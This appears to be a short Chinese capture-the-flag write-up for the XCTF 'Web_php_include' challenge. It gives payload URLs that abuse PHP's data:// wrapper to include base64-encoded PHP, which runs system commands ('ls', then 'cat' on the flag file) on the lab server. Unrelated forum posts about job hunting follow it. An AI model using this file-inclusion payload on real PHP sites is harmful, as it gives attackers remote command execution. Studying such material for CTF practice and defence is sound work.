攻防世界-Web进阶-Web_php_include

1-使用data://协议  (php伪协议: https://www.jianshu.com/p/9a7148a753e0

    使用方法: data://text/plain;base64, [base64编码数据]
    例如:此题中hackbar中提交url:http://220.249.52.133:40024/?page=data://text/plain;PD9waHAgc3lzdGVtKCJscyIpPz4=  (<?php system("ls")?>)
        
    再次提交:http://220.249.52.133:40024/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==
                    (<?php system("cat fl4gisisish3r3.php")?>)


全部评论

相关推荐

05-12 17:00
门头沟学院 Java
king122:你的项目描述至少要分点呀,要实习的话,你的描述可以使用什么技术,实现了什么难点,达成了哪些数字指标,这个数字指标尽量是真实的,这样面试应该会多很多,就这样自己包装一下,包装不好可以找我,我有几个大厂最近做过的实习项目也可以包装一下
点赞 评论 收藏
分享
点赞 评论 收藏
分享
uu们,拒offer时hr很生气怎么办我哭死
爱睡觉的冰箱哥:人家回收你的offer,或者oc后没给你发offer的时候可不会愧疚你,所以你拒了也没必要愧疚他。
点赞 评论 收藏
分享
评论
点赞
收藏
分享

创作者周榜

更多
牛客网
牛客网在线编程
牛客网题解
牛客企业服务